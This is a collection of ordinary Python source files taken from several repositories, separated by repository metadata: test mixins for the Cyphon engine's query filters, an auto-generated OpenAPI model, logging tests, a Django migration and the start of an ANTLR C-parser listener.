author_email='konsta.vesterinen@gmail.com',
url='http://github.com/kvesteri/serializer',
packages=['serializer'],
include_package_data=True,
license='BSD',
zip_safe=False,
platforms='any',
install_requires=[
'setuptools',
'simplejson'
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| 25.805556 | 70 | 0.625404 |
352c4e9149a636814fd4a346f34ccd5437e76805 | 32,800 | py | Python | Incident-Response/Tools/cyphon/cyphon/engines/tests/mixins.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 1 | 2021-07-24T17:22:50.000Z | 2021-07-24T17:22:50.000Z | Incident-Response/Tools/cyphon/cyphon/engines/tests/mixins.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-28T03:40:31.000Z | 2022-02-28T03:40:52.000Z | Incident-Response/Tools/cyphon/cyphon/engines/tests/mixins.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-25T08:34:51.000Z | 2022-03-16T17:29:44.000Z | # -*- coding: utf-8 -*-
# Copyright 2017-2019 ControlScan, Inc.
#
# This file is part of Cyphon Engine.
#
# Cyphon Engine is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Cyphon Engine is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cyphon Engine. If not, see <http://www.gnu.org/licenses/>.
"""
Tests the CRUD methods of Engine subclasses via shared test case mixins.
"""
# standard library
from datetime import timedelta
import json
# third party
from django.utils import timezone
# local
from cyphon.fieldsets import QueryFieldset
from bottler.datafields.models import DataField
from engines.queries import EngineQuery
from engines.sorter import SortParam, Sorter
class CRUDTestCaseMixin(object):
"""
    Mixin for use with an EngineBaseTestCase subclass. Provides tests
for the CRUD methods of an Engine subclass.
"""
def test_insert(self):
"""
Tests the insert method.
"""
test_text = 'this is an insert test post'
doc_id = self.engine.insert({'text': test_text})
result = self.engine.find_by_id(doc_id)
self.assertEqual(self._get_id([result], 0), doc_id)
self.assertEqual(self._get_doc([result], 0)['text'], test_text)
def test_find_by_id_single(self):
"""
Tests the find_by_id method for a single document.
"""
test_text1 = 'this is a find_by_id test post'
test_text2 = 'this is another find_by_id test post'
doc_id1 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'text': test_text1
})
doc_id2 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 2
},
'text': test_text2
})
result = self.engine.find_by_id(doc_id1) # leave out doc_id2
self.assertEqual(self._get_id([result], 0), doc_id1)
self.assertEqual(self._get_doc([result], 0)['text'], test_text1)
def test_find_by_id_single_no_match(self):
"""
Tests the find_by_id method for a single document id that doesn't match
any documents.
"""
actual = self.engine.find_by_id(1)
self.assertEqual(actual, None)
def test_find_by_id_multiple(self):
"""
Tests the find_by_id method for multiple documents.
"""
test_text1 = 'this is a find_by_id test post'
test_text2 = 'this is another find_by_id test post'
test_text3 = 'yet another test post'
doc_id1 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'text': test_text1
})
doc_id2 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 2
},
'text': test_text2
})
doc_id3 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 3
},
'text': test_text3
})
results = self.engine.find_by_id([doc_id1, doc_id2]) # leave out doc_id3
expected_ids = [doc_id1, doc_id2]
self.assertEqual(len(results), 2)
self.assertIn(self._get_id(results, 0), expected_ids)
self.assertIn(self._get_id(results, 1), expected_ids)
self.assertEqual(self._get_doc(results, 0)['text'], test_text1)
self.assertEqual(self._get_doc(results, 1)['text'], test_text2)
def test_find_by_id_multi_no_match(self):
"""
Tests the find_by_id method for multiple document ids that don't
match any documents.
"""
actual = self.engine.find_by_id([1, 2])
self.assertEqual(actual, None)
def test_remove_by_id_single(self):
"""
Tests the remove_by_id method for a single document.
"""
test_text = 'this is a remove_by_id test post'
doc_id = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'text': test_text
})
results = self.engine.find_by_id([doc_id])
self.assertEqual(len(results), 1)
self.engine.remove_by_id(doc_id)
results = self.engine.find_by_id([doc_id])
self.assertEqual(results, None)
def test_remove_by_id_multiple(self):
"""
Tests the remove_by_id method for multiple documents.
"""
doc_id1 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'text': 'a remove_by_id test post'
})
doc_id2 = self.engine.insert({
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 2
},
'text': 'another remove_by_id test post'
})
results = self.engine.find_by_id([doc_id1, doc_id2])
self.assertEqual(len(results), 2)
self.engine.remove_by_id([doc_id1, doc_id2])
results = self.engine.find_by_id([doc_id1, doc_id2])
self.assertEqual(results, None)
class FilterTestCaseMixin(object):
"""
Mixin for use with a EngineBaseTestCase subclass to test the find() method
of an Engine subclass. Provides tests for the standard set of query
selectors (eq, gte, etc.) that are used in defining queries.
"""
time = timezone.now()
test_docs = [
{
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 1
},
'_saved_date': time - timedelta(days=1),
'user': {
'screen_name': 'john',
'email': 'john@example.com',
'link': 'http://www.acme.com/john',
'age': 20,
'last_login': '2015-10-21 14:46:44.329193-04'
},
'content': {
'text': 'I like cats.',
'tags': ['cats', 'pets']
},
'location': [75.0, 25.0]
},
{
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 2
},
'_saved_date': time,
'user': {
'screen_name': 'jane',
'email': 'jane@example.com',
'link': 'http://www.acme.com/jane',
'age': 30,
'last_login': None
},
'content': {
'text': 'I like dogs.',
'tags': ['dogs', 'pets']
},
'location': [25.0, 25.0]
},
{
'_raw_data': {
'backend': 'example_backend',
'database': 'example_database',
'collection': 'raw_data',
'doc_id': 3
},
'_saved_date': time + timedelta(days=1),
'user': {
'screen_name': 'jack',
'email': 'jack@example.com',
'link': 'http://www.acme.com/jack',
'age': 30
},
'content': {
'text': 'I LIKE CATS AND DOGS.',
'tags': ['cats', 'dogs', 'pets']
}
}
]
polygon1 = {
'type': 'Feature',
'geometry': {
'type': 'Polygon',
'coordinates': [
[[50.0, 0.0], [100.0, 0.0], [100.0, 50.0],
[50.0, 50.0], [50.0, 0.0]]
]
}
}
polygon2 = {
'type': 'Feature',
'geometry': {
'type': 'Polygon',
'coordinates': [
[[0.0, 0.0], [100.0, 0.0], [100.0, 0.0],
[00.0, 50.0], [0.0, 0.0]]
]
}
}
nonpolygon = {
'type': 'Feature',
'geometry': {
'type': 'Point',
'coordinates': [100.0, 0.5]
},
}
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='cat'
),
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='dog'
)
]
timeframe = [
QueryFieldset(
field_name='_saved_date',
field_type='DateTimeField',
operator='gte',
value=time
),
QueryFieldset(
field_name='_saved_date',
field_type='DateTimeField',
operator='lte',
value=time + timedelta(days=2)
)
]
def test_within_single_polygon(self):
"""
Tests the find method using a 'within' filter for a feature collection
with a single polygon.
"""
features = {
'type': 'FeatureCollection',
'features': [self.polygon1]
}
fieldsets = [
QueryFieldset(
field_name='location',
field_type='PointField',
operator='within',
value=json.dumps(features)
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_name = 'john'
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'],
expected_name)
def test_within_multiple_polygons(self):
"""
Tests the find method using a 'within' filter for a feature collection
with more than one polygon.
"""
features = {
'type': 'FeatureCollection',
'features': [self.polygon1, self.polygon2]
}
fieldsets = [
QueryFieldset(
field_name='location',
field_type='PointField',
operator='within',
value=json.dumps(features)
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jane']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'],
expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'],
expected_names)
def test_within_non_polygon(self):
"""
Tests the find method using a 'within' filter for a feature collection
that includes a non-polygon feature.
"""
features = {
'type': 'FeatureCollection',
'features': [self.polygon1, self.nonpolygon]
}
fieldsets = [
QueryFieldset(
field_name='location',
field_type='PointField',
operator='within',
value=json.dumps(features)
)
]
with self.assertRaises(ValueError):
query = EngineQuery(fieldsets, 'AND')
self.engine.find(query)
def test_not_missing(self):
"""
Tests the find method using a 'not missing' filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.last_login',
field_type='DateTimeField',
operator='not:missing',
value=''
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_name = 'john'
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'],
expected_name)
def test_regex_with_fragment(self):
"""
Tests the find method using a 'regex' filter.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='cat'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jack']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_regex_with_caps(self):
"""
Tests that 'regex' filter is not case-sensitive.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='CAT'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jack']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_regex_with_multiple_words(self):
"""
Tests the 'regex' filter with multiple words.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='regex',
value='I like cats'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jack']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_regex_unmatched_quote(self):
"""
Tests the find method for a 'regex' filter with a string
containing an unmatched quotation mark.
"""
fieldsets = [
QueryFieldset(
field_name='user.screen_name',
field_type='CharField',
operator='regex',
value='"john'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
self.assertEqual(count, 0)
def test_not_regex_with_fragment(self):
"""
Tests the find method for a 'not:regex' filter with a word fragment.
"""
fieldsets = [
QueryFieldset(
field_name='user.screen_name',
field_type='CharField',
operator='not:regex',
value='ja'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'john')
def test_not_regex_with_multi_words(self):
"""
Tests the find method for a 'not:regex' filter with multiple words.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='not:regex',
value='I like cats and dogs'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jane']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_and(self):
"""
Tests the find method using two query terms joined by 'AND'.
"""
query = EngineQuery(self.fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jack')
def test_or(self):
"""
Tests the find method using two query terms joined by 'OR'.
"""
query = EngineQuery(self.fieldsets, 'OR')
results = self.engine.find(query)
count = results['count']
self.assertEqual(count, 3)
def test_eq_numeric(self):
"""
Tests the find method for an 'eq' (equals) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='eq',
value='20'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'john')
def test_eq_text(self):
"""
Tests the find method for an 'eq' (equals) filter on a CharField.
"""
fieldsets = [
QueryFieldset(
field_name='content.text',
field_type='TextField',
operator='eq',
value='I like dogs.'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jane')
def test_eq_email(self):
"""
Tests the find method for an 'eq' (equals) filter on an EmailField.
"""
fieldsets = [
QueryFieldset(
field_name='user.email',
field_type='EmailField',
operator='eq',
value='jane@example.com'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jane')
def test_in(self):
"""
Tests the find method for an 'in' filter.
"""
fieldsets = [
QueryFieldset(
field_name='content.tags',
field_type='ListField',
operator='in',
value='cats'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jack']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_gt(self):
"""
Tests the find method for a 'gt' (greater than) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='gt',
value=20
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
expected_names = ['jane', 'jack']
count = results['count']
docs = results['results']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_gte(self):
"""
Tests the find method for a 'gte' (greater than or equal to) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='gte',
value=20
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
expected_names = ['jane', 'jack']
count = results['count']
docs = results['results']
self.assertEqual(count, 3)
def test_lt(self):
"""
Tests the find method for an 'lt' (less than) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='lt',
value=30
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'john')
def test_lte(self):
"""
Tests the find method for an 'lte' (less than or equal to) filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.age',
field_type='IntegerField',
operator='lte',
value=30
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 3)
def test_not_eq(self):
"""
Tests the find method for a 'not:eq' filter.
"""
fieldsets = [
QueryFieldset(
field_name='user.screen_name',
field_type='CharField',
operator='not:eq',
value='jack'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
expected_names = ['john', 'jane']
self.assertEqual(count, 2)
self.assertIn(self._get_doc(docs, 0)['user']['screen_name'], expected_names)
self.assertIn(self._get_doc(docs, 1)['user']['screen_name'], expected_names)
def test_not_in(self):
"""
Tests the find method for a 'not:in' filter.
"""
fieldsets = [
QueryFieldset(
field_name='content.tags',
field_type='CharField',
operator='not:in',
value='cats'
)
]
query = EngineQuery(fieldsets, 'AND')
results = self.engine.find(query)
count = results['count']
docs = results['results']
self.assertEqual(count, 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jane')
def test_find_fields(self):
"""
Tests that the find method only returns fields defined in the
Engine's schema.
"""
doc_id = self.engine.insert({
'content': {
'text': 'I like cats and dogs.',
'tags': ['cats', 'dogs'],
},
'user': {
'screen_name': 'Jill',
'email': 'jill@example.com',
},
})
self.engine.schema = [
DataField(
field_name='content.text',
field_type='TextField',
target_type='Keyword'
),
DataField(
field_name='user.screen_name',
field_type='CharField',
target_type='Account'
)
]
fieldsets = [
QueryFieldset(
field_name='user.screen_name',
field_type='CharField',
operator='eq',
value='Jill'
)
]
query = EngineQuery(fieldsets, 'AND')
actual = self.engine.find(query)
expected = {
'count': 1,
'results': [
{
'_id': doc_id,
'content': {
'text': 'I like cats and dogs.'
},
'user': {
'screen_name': 'Jill'
}
}
]
}
self.assertEqual(actual, expected)
def test_find_tf_no_tf_and(self):
"""
Tests the find method with no timeframe and an 'AND' joiner.
"""
fieldsets = self.fieldsets
joiner = 'AND'
query = EngineQuery(fieldsets, joiner)
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 1)
self.assertEqual(len(docs), 1)
self.assertEqual(self._get_doc(docs, 0)['user']['screen_name'], 'jack')
def test_find_tf_no_tf_or(self):
"""
Tests the find method with no timeframe and an 'OR' joiner.
"""
fieldsets = self.fieldsets
joiner = 'OR'
query = EngineQuery(fieldsets, joiner)
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 3)
self.assertEqual(len(docs), 3)
def test_find_tf_w_tf_and(self):
"""
Tests the find method with a timeframe and an 'AND' joiner.
"""
field_query = EngineQuery(self.fieldsets, 'AND')
timeframe = self.timeframe
subqueries = [field_query] + timeframe
query = EngineQuery(subqueries, 'AND')
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 1)
self.assertEqual(len(docs), 1)
def test_find_tf_w_tf_or(self):
"""
Tests the find method with a timeframe and an 'OR' joiner.
"""
field_query = EngineQuery(self.fieldsets, 'OR')
timeframe = self.timeframe
subqueries = [field_query] + timeframe
query = EngineQuery(subqueries, 'AND')
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 2)
self.assertEqual(len(docs), 2)
def test_find_tf_start_time_or(self):
"""
Tests the find method with an endtime and an 'OR' joiner.
"""
field_query = EngineQuery(self.fieldsets, 'OR')
timeframe = [
QueryFieldset(
field_name='_saved_date',
field_type='DateTimeField',
operator='gte',
value=self.time - timedelta(days=2)
)
]
subqueries = [field_query] + timeframe
query = EngineQuery(subqueries, 'AND')
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 3)
self.assertEqual(len(docs), 3)
def test_find_tf_end_time_or(self):
"""
Tests the find method with an endtime and an 'OR' joiner.
"""
field_query = EngineQuery(self.fieldsets, 'OR')
timeframe = [
QueryFieldset(
field_name='_saved_date',
field_type='DateTimeField',
operator='gte',
value=self.time + timedelta(hours=1)
)
]
subqueries = [field_query] + timeframe
query = EngineQuery(subqueries, 'AND')
results = self.engine.find(query)
docs = results['results']
count = results['count']
self.assertEqual(count, 1)
self.assertEqual(len(docs), 1)
def test_find_pagination_sort(self):
"""
Tests pagination and sorting of find results.
"""
sorter = Sorter([
SortParam(
field_name='user.age',
field_type='IntegerField',
order='DESC'
),
SortParam(
field_name='user.screen_name',
field_type='CharField',
order='ASC'
)
])
field_query = EngineQuery(self.fieldsets, 'OR')
results = self.engine.find(
query=field_query,
sorter=sorter,
page=1,
page_size=2
)
docs = results['results']
count = results['count']
self.assertEqual(count, 3)
self.assertEqual(len(docs), 2)
self.assertEqual(docs[0]['user']['screen_name'], 'jack')
results = self.engine.find(
query=field_query,
sorter=sorter,
page=2,
page_size=2
)
docs = results['results']
count = results['count']
self.assertEqual(count, 3)
self.assertEqual(len(docs), 1)
self.assertEqual(docs[0]['user']['screen_name'], 'john')
def test_filter_ids_analyzed(self):
"""
Tests the filter_ids method.
"""
id_0 = self.engine.insert(self.test_docs[0])
id_1 = self.engine.insert(self.test_docs[1])
id_2 = self.engine.insert(self.test_docs[2])
ids = [id_0, id_1, id_2]
actual = self.engine.filter_ids(
doc_ids=ids,
fields=[
DataField(field_name='content.text', field_type='TextField'),
DataField(field_name='content.tags', field_type='ListField')
],
value='CATS'
)
expected = [id_0, id_2]
actual.sort()
expected.sort()
self.assertEqual(actual, expected)
def test_filter_ids_not_analyzed(self):
"""
Tests the filter_ids method for a mixture of exact-text and
full-text fields in ELasticsearch.
"""
id_0 = self.engine.insert(self.test_docs[0])
id_1 = self.engine.insert(self.test_docs[1])
id_2 = self.engine.insert(self.test_docs[2])
ids = [id_0, id_1, id_2]
actual = self.engine.filter_ids(
doc_ids=ids,
fields=[
DataField(field_name='user.link', field_type='URLField'),
DataField(field_name='user.email', field_type='EmailField')
],
value='example'
)
expected = [id_0, id_1, id_2]
actual.sort()
expected.sort()
self.assertEqual(actual, expected)
def test_filter_ids_mixed(self):
"""
Tests the filter_ids method for a mixture of exact-text and
full-text fields in ELasticsearch.
"""
id_0 = self.engine.insert(self.test_docs[0])
id_1 = self.engine.insert(self.test_docs[1])
id_2 = self.engine.insert(self.test_docs[2])
ids = [id_0, id_1, id_2]
actual = self.engine.filter_ids(
doc_ids=ids,
fields=[
DataField(field_name='content.text', field_type='TextField'),
DataField(field_name='user.email', field_type='EmailField')
],
value='example'
)
expected = [id_0, id_1, id_2]
actual.sort()
expected.sort()
self.assertEqual(actual, expected)
| 32 | 84 | 0.517104 |
2ba895283ed55081e6d980725c75439a5723fef5 | 2,515 | py | Python | backend/openapi_server/models/action_call.py | tmdt-buw/gideon | b3e7d0614baf80c149d3ef7f1c80a94339feda4b | [
"Apache-2.0"
] | null | null | null | backend/openapi_server/models/action_call.py | tmdt-buw/gideon | b3e7d0614baf80c149d3ef7f1c80a94339feda4b | [
"Apache-2.0"
] | null | null | null | backend/openapi_server/models/action_call.py | tmdt-buw/gideon | b3e7d0614baf80c149d3ef7f1c80a94339feda4b | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.application_action import ApplicationAction
from openapi_server.models.application_state import ApplicationState
from openapi_server import util
from openapi_server.models.application_action import ApplicationAction # noqa: E501
from openapi_server.models.application_state import ApplicationState # noqa: E501
class ActionCall(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, action=None, state=None): # noqa: E501
"""ActionCall - a model defined in OpenAPI
:param action: The action of this ActionCall. # noqa: E501
:type action: ApplicationAction
:param state: The state of this ActionCall. # noqa: E501
:type state: ApplicationState
"""
self.openapi_types = {
'action': ApplicationAction,
'state': ApplicationState
}
self.attribute_map = {
'action': 'action',
'state': 'state'
}
self._action = action
self._state = state
@classmethod
def from_dict(cls, dikt) -> 'ActionCall':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The ActionCall of this ActionCall. # noqa: E501
:rtype: ActionCall
"""
return util.deserialize_model(dikt, cls)
@property
def action(self):
"""Gets the action of this ActionCall.
:return: The action of this ActionCall.
:rtype: ApplicationAction
"""
return self._action
@action.setter
def action(self, action):
"""Sets the action of this ActionCall.
:param action: The action of this ActionCall.
:type action: ApplicationAction
"""
self._action = action
@property
def state(self):
"""Gets the state of this ActionCall.
:return: The state of this ActionCall.
:rtype: ApplicationState
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this ActionCall.
:param state: The state of this ActionCall.
:type state: ApplicationState
"""
self._state = state
| 26.473684 | 96 | 0.636978 |
b5f150e2aad0d7f6a828ef872d799287c6fb9d0c | 1,413 | py | Python | tests/test_base.py | mrtovsky/estimium | 66c8bf077c72d487fa937d28a482d36055d0c433 | [
"MIT"
] | 1 | 2020-04-01T16:29:10.000Z | 2020-04-01T16:29:10.000Z | tests/test_base.py | mrtovsky/estimium | 66c8bf077c72d487fa937d28a482d36055d0c433 | [
"MIT"
] | null | null | null | tests/test_base.py | mrtovsky/estimium | 66c8bf077c72d487fa937d28a482d36055d0c433 | [
"MIT"
] | null | null | null | import logging
from typing import Optional
from estimium.base import ClassLogger
class DummyClass(ClassLogger):
"""Dummy class for testing inheritance from ClassLogger."""
def __init__(self, logger: Optional[logging.Logger] = None):
super().__init__(logger=logger)
self.logger.info("Initializing DummyClass")
def run(self):
self.logger.debug("Entering `run` method")
def test_class_logging_with_getting_logger(caplog):
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
dummy = DummyClass()
dummy.run()
assert caplog.record_tuples == [
(
"{}.{}".format(__name__, DummyClass.__name__),
logging.INFO,
"Initializing DummyClass",
),
(
"{}.{}".format(__name__, DummyClass.__name__),
logging.DEBUG,
"Entering `run` method",
),
]
def test_class_logging_with_specifying_logger(caplog):
logger = logging.getLogger("foo")
logger.setLevel(logging.DEBUG)
dummy = DummyClass(logger=logger)
dummy.run()
assert caplog.record_tuples == [
(
"foo.{}".format(DummyClass.__name__),
logging.INFO,
"Initializing DummyClass",
),
(
"foo.{}".format(DummyClass.__name__),
logging.DEBUG,
"Entering `run` method",
),
]
| 24.362069 | 64 | 0.598018 |
edb996bcacfd2204a4766218b03ccd7db781e4b4 | 240 | py | Python | src/gocept/objectquery/tests/objects2.py | gocept/gocept.objectquery | afe02ab029eb1291978ea84e2de1825adb7e5aec | [
"ZPL-2.1"
] | null | null | null | src/gocept/objectquery/tests/objects2.py | gocept/gocept.objectquery | afe02ab029eb1291978ea84e2de1825adb7e5aec | [
"ZPL-2.1"
] | null | null | null | src/gocept/objectquery/tests/objects2.py | gocept/gocept.objectquery | afe02ab029eb1291978ea84e2de1825adb7e5aec | [
"ZPL-2.1"
] | null | null | null | # Copyright (c) 2007-2009 gocept gmbh & co. kg
# See also LICENSE.txt
import persistent
# class definitions for the test db
class Library(persistent.Persistent):
"""This class is used to test querying for module names of classes."""
| 24 | 74 | 0.7375 |
c71b4e41395a8cb5f9c6cf0e5222c47291237334 | 601 | py | Python | risk_management/users/migrations/0004_auto_20180607_1413.py | justin441/risk_management | 2f5f0f62aae34998db7cf4155297ce4f6a8d774e | [
"MIT"
] | null | null | null | risk_management/users/migrations/0004_auto_20180607_1413.py | justin441/risk_management | 2f5f0f62aae34998db7cf4155297ce4f6a8d774e | [
"MIT"
] | null | null | null | risk_management/users/migrations/0004_auto_20180607_1413.py | justin441/risk_management | 2f5f0f62aae34998db7cf4155297ce4f6a8d774e | [
"MIT"
] | null | null | null | # Generated by Django 2.0.6 on 2018-06-07 13:13
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0003_auto_20180607_1340'),
]
operations = [
migrations.RemoveField(
model_name='user',
name='nom',
),
migrations.AlterField(
model_name='user',
name='business_unit',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='employes', to='users.BusinessUnit'),
),
]
| 25.041667 | 131 | 0.615641 |
69974ee0e31051a17146f07eb03e08b3c39d05b5 | 25,797 | py | Python | edk2basetools/Ecc/CParser4/CListener.py | YuweiChen1110/edk2-basetools | cfd05c928492b7ffd1329634cfcb089db995eeca | [
"BSD-2-Clause-Patent"
] | 7 | 2020-09-08T01:16:14.000Z | 2021-12-25T06:32:42.000Z | edk2basetools/Ecc/CParser4/CListener.py | YuweiChen1110/edk2-basetools | cfd05c928492b7ffd1329634cfcb089db995eeca | [
"BSD-2-Clause-Patent"
] | 25 | 2020-11-02T23:28:42.000Z | 2022-03-29T01:57:40.000Z | edk2basetools/Ecc/CParser4/CListener.py | matthewfcarlson/edk2-pytool-base | ddf78ca6e2110f03e020a5bd0ca32b2a463fecff | [
"BSD-2-Clause-Patent"
] | 18 | 2020-09-10T02:54:03.000Z | 2021-11-29T06:41:52.000Z | # Generated from C.g4 by ANTLR 4.7.1
from antlr4 import *
if __name__ is not None and "." in __name__:
from .CParser import CParser
else:
from CParser import CParser
## @file
# The file defines the parser for C source files.
#
# THIS FILE IS AUTO-GENENERATED. PLEASE DON NOT MODIFY THIS FILE.
# This file is generated by running:
# java org.antlr.Tool C.g
#
# Copyright (c) 2009 - 2010, Intel Corporation All rights reserved.
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
import edk2basetools.Ecc.CodeFragment as CodeFragment
import edk2basetools.Ecc.FileProfile as FileProfile
# This class defines a complete listener for a parse tree produced by CParser.
class CListener(ParseTreeListener):
# Enter a parse tree produced by CParser#translation_unit.
# @param ctx Type: CParser.Translation_unitContext
def enterTranslation_unit(self,ctx):
pass
# Exit a parse tree produced by CParser#translation_unit.
# @param ctx Type: CParser.Translation_unitContext
def exitTranslation_unit(self,ctx):
pass
# Enter a parse tree produced by CParser#external_declaration.
# @param ctx Type: CParser.External_declarationContext
def enterExternal_declaration(self,ctx):
pass
# Exit a parse tree produced by CParser#external_declaration.
# @param ctx Type: CParser.External_declarationContext
def exitExternal_declaration(self,ctx):
